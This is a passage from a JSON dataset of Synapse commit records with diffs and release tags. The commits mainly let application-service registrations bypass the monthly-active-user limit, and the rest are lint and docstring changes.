"v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [] - }, - { - "commit_id": "4c33796b20f934a43f4f09a2bac6653c18d72b69", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1608209721, - "hunks": 16, - "message": "Correctly handle AS registerations and add test", - "diff": [ - "diff --git a/synapse/handlers/auth.py b/synapse/handlers/auth.py", - "index c7dc07008..3b8ac4325 100644", - "--- a/synapse/handlers/auth.py", - "+++ b/synapse/handlers/auth.py", - "@@ -711,2 +711,3 @@ class AuthHandler(BaseHandler):", - " puppets_user_id: Optional[str] = None,", - "+ is_appservice_ghost: bool = False,", - " ) -> str:", - "@@ -727,2 +728,3 @@ class AuthHandler(BaseHandler):", - " no expiry.", - "+ is_appservice_ghost: Whether the user is an application ghost user", - " Returns:", - "@@ -747,3 +749,7 @@ class AuthHandler(BaseHandler):", - "- await self.auth.check_auth_blocking(user_id)", - "+ if (", - "+ not is_appservice_ghost", - "+ or self.hs.config.appservice.track_appservice_user_ips", - "+ ):", - "+ await self.auth.check_auth_blocking(user_id)", - "diff --git a/synapse/handlers/register.py b/synapse/handlers/register.py", - "index 0d85fd086..039aff106 100644", - "--- a/synapse/handlers/register.py", - "+++ b/synapse/handlers/register.py", - "@@ -632,2 +632,3 @@ class RegistrationHandler(BaseHandler):", - " is_guest: bool = False,", - "+ is_appservice_ghost: bool = False,", - " ) -> Tuple[str, str]:", - "@@ -653,2 +654,3 @@ class RegistrationHandler(BaseHandler):", - " is_guest=is_guest,", - "+ is_appservice_ghost=is_appservice_ghost,", - " )", - "@@ -674,3 +676,6 @@ class RegistrationHandler(BaseHandler):", - " access_token = await self._auth_handler.get_access_token_for_user_id(", - "- user_id, device_id=registered_device_id, valid_until_ms=valid_until_ms", - "+ user_id,", - "+ device_id=registered_device_id,", - "+ valid_until_ms=valid_until_ms,", - "+ is_appservice_ghost=is_appservice_ghost,", - " )", - "diff --git a/synapse/replication/http/login.py b/synapse/replication/http/login.py", - "index 4c81e2d78..36071feb3 100644", - "--- a/synapse/replication/http/login.py", - "+++ b/synapse/replication/http/login.py", - "@@ -38,3 +38,5 @@ class RegisterDeviceReplicationServlet(ReplicationEndpoint):", - " @staticmethod", - "- async def _serialize_payload(user_id, device_id, initial_display_name, is_guest):", - "+ async def _serialize_payload(", - "+ user_id, device_id, initial_display_name, is_guest, is_appservice_ghost", - "+ ):", - " \"\"\"", - "@@ -50,2 +52,3 @@ class RegisterDeviceReplicationServlet(ReplicationEndpoint):", - " \"is_guest\": is_guest,", - "+ \"is_appservice_ghost\": is_appservice_ghost,", - " }", - "@@ -58,5 +61,10 @@ class RegisterDeviceReplicationServlet(ReplicationEndpoint):", - " is_guest = content[\"is_guest\"]", - "+ is_appservice_ghost = content[\"is_appservice_ghost\"]", - " device_id, access_token = await self.registration_handler.register_device(", - "- user_id, device_id, initial_display_name, is_guest", - "+ user_id,", - "+ device_id,", - "+ initial_display_name,", - "+ is_guest,", - "+ is_appservice_ghost=is_appservice_ghost,", - " )", - "diff --git a/synapse/rest/client/v2_alpha/register.py b/synapse/rest/client/v2_alpha/register.py", - "index a89ae6ddf..722d99381 100644", - "--- a/synapse/rest/client/v2_alpha/register.py", - "+++ b/synapse/rest/client/v2_alpha/register.py", - "@@ -657,5 +657,9 @@ class RegisterRestServlet(RestServlet):", - " )", - "- return await self._create_registration_details(user_id, body)", - "+ return await self._create_registration_details(", - "+ user_id, body, is_appservice_ghost=True,", - "+ )", - "- async def _create_registration_details(self, user_id, params):", - "+ async def _create_registration_details(", - "+ self, user_id, params, is_appservice_ghost=False", - "+ ):", - " \"\"\"Complete registration of newly-registered user", - "@@ -676,3 +680,7 @@ class RegisterRestServlet(RestServlet):", - " device_id, access_token = await self.registration_handler.register_device(", - "- user_id, device_id, initial_display_name, is_guest=False", - "+ user_id,", - "+ device_id,", - "+ initial_display_name,", - "+ is_guest=False,", - "+ is_appservice_ghost=is_appservice_ghost,", - " )", - "diff --git a/tests/test_mau.py b/tests/test_mau.py", - "index c5ec6396a..26548b461 100644", - "--- a/tests/test_mau.py", - "+++ b/tests/test_mau.py", - "@@ -21,2 +21,3 @@ from synapse.api.constants import LoginType", - " from synapse.api.errors import Codes, HttpResponseException, SynapseError", - "+from synapse.appservice import ApplicationService", - " from synapse.rest.client.v2_alpha import register, sync", - "@@ -77,2 +78,40 @@ class TestMauLimit(unittest.HomeserverTestCase):", - "+ def test_as_ignores_mau(self):", - "+ \"\"\"Test that application services can still create users when the MAU", - "+ limit has been reached.", - "+ \"\"\"", - "+", - "+ # Create and sync so that the MAU counts get updated", - "+ token1 = self.create_user(\"kermit1\")", - "+ self.do_sync_for_user(token1)", - "+ token2 = self.create_user(\"kermit2\")", - "+ self.do_sync_for_user(token2)", - "+", - "+ # check we're testing what we think we are: there should be two active users", - "+ self.assertEqual(self.get_success(self.store.get_monthly_active_count()), 2)", - "+", - "+ # We've created and activated two users, we shouldn't be able to", - "+ # register new users", - "+ with self.assertRaises(SynapseError) as cm:", - "+ self.create_user(\"kermit3\")", - "+", - "+ e = cm.exception", - "+ self.assertEqual(e.code, 403)", - "+ self.assertEqual(e.errcode, Codes.RESOURCE_LIMIT_EXCEEDED)", - "+", - "+ # Cheekily add an application service that we use to register a new user", - "+ # with.", - "+ as_token = \"foobartoken\"", - "+ self.store.services_cache.append(", - "+ ApplicationService(", - "+ token=as_token,", - "+ hostname=self.hs.hostname,", - "+ id=\"SomeASID\",", - "+ sender=\"@as_sender:test\",", - "+ namespaces={\"users\": [{\"regex\": \"@as_*\", \"exclusive\": True}]},", - "+ )", - "+ )", - "+", - "+ self.create_user(\"as_kermit4\", token=as_token)", - "+", - " def test_allowed_after_a_month_mau(self):", - "@@ -194,3 +233,3 @@ class TestMauLimit(unittest.HomeserverTestCase):", - "- def create_user(self, localpart):", - "+ def create_user(self, localpart, token=None):", - " request_data = json.dumps(", - "@@ -203,3 +242,5 @@ class TestMauLimit(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(\"POST\", \"/register\", request_data)", - "+ request, channel = self.make_request(", - "+ \"POST\", \"/register\", request_data, access_token=token", - "+ )" - ], - "changed_files": [ - "synapse/handlers/auth.py", - "synapse/handlers/register.py", - "synapse/replication/http/login.py", - "synapse/rest/client/v2_alpha/register.py", - "tests/test_mau.py" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [] - }, - { - "commit_id": "c9dd47d66864714043b51a235909e3e957740c7b", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1608071286, - "hunks": 6, - "message": "lint", - "diff": [ - "diff --git a/tests/replication/test_auth.py b/tests/replication/test_auth.py", - "index c5ab3032a..f35a5235e 100644", - "--- a/tests/replication/test_auth.py", - "+++ b/tests/replication/test_auth.py", - "@@ -15,5 +15,3 @@", - " import logging", - "-from typing import Tuple", - "-from synapse.http.site import SynapseRequest", - " from synapse.rest.client.v2_alpha import register", - "diff --git a/tests/replication/test_client_reader_shard.py b/tests/replication/test_client_reader_shard.py", - "index abcc74f93..4608b65a0 100644", - "--- a/tests/replication/test_client_reader_shard.py", - "+++ b/tests/replication/test_client_reader_shard.py", - "@@ -16,3 +16,2 @@ import logging", - "-from synapse.http.site import SynapseRequest", - " from synapse.rest.client.v2_alpha import register", - "@@ -20,3 +19,3 @@ from synapse.rest.client.v2_alpha import register", - " from tests.replication._base import BaseMultiWorkerStreamTestCase", - "-from tests.server import FakeChannel, make_request", - "+from tests.server import make_request", - "diff --git a/tests/rest/client/v1/test_login.py b/tests/rest/client/v1/test_login.py", - "index 041f2766d..566776e97 100644", - "--- a/tests/rest/client/v1/test_login.py", - "+++ b/tests/rest/client/v1/test_login.py", - "@@ -717,3 +717,3 @@ class AppserviceLoginRestServletTestCase(unittest.HomeserverTestCase):", - " def register_as_user(self, username):", - "- channel = self.make_request(", - "+ self.make_request(", - " b\"POST\",", - "diff --git a/tests/rest/client/v2_alpha/test_auth.py b/tests/rest/client/v2_alpha/test_auth.py", - "index da866c8b4..51323b3da 100644", - "--- a/tests/rest/client/v2_alpha/test_auth.py", - "+++ b/tests/rest/client/v2_alpha/test_auth.py", - "@@ -22,3 +22,2 @@ from synapse.api.constants import LoginType", - " from synapse.handlers.ui_auth.checkers import UserInteractiveAuthChecker", - "-from synapse.http.site import SynapseRequest", - " from synapse.rest.client.v1 import login", - "diff --git a/tests/unittest.py b/tests/unittest.py", - "index 16fd4f32b..39e5e7b85 100644", - "--- a/tests/unittest.py", - "+++ b/tests/unittest.py", - "@@ -22,3 +22,3 @@ import logging", - " import time", - "-from typing import Dict, Optional, Tuple, Type, TypeVar, Union, overload", - "+from typing import Dict, Optional, Type, TypeVar, Union" - ], - "changed_files": [ - "tests/replication/test_auth.py", - "tests/replication/test_client_reader_shard.py", - "tests/rest/client/v1/test_login.py", - "tests/rest/client/v2_alpha/test_auth.py", - "tests/unittest.py" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [] - }, - { - "commit_id": "adfc9cb53dc81a0eae06aea740a0ca4708cbdc0c", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1607513208, - "hunks": 0, - "message": "Merge branch 'master' into develop", - "diff": [], - "changed_files": [], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [] - }, - { - "commit_id": "14eab1b4d2cf837c6b0925da7194cc5940e9401c", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1608221653, - "hunks": 1, - "message": "Update tests/test_mau.py Co-authored-by: Andrew Morgan <1342360+anoadragon453@users.noreply.github.com>", - "diff": [ - "diff --git a/tests/test_mau.py b/tests/test_mau.py", - "index 26548b461..586294446 100644", - "--- a/tests/test_mau.py", - "+++ b/tests/test_mau.py", - "@@ -80,3 +80,4 @@ class TestMauLimit(unittest.HomeserverTestCase):", - " \"\"\"Test that application services can still create users when the MAU", - "- limit has been reached.", - "+ limit has been reached. This only works when application service", - "+ user ip tracking is disabled.", - " \"\"\"" - ], - "changed_files": [ - "tests/test_mau.py" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - 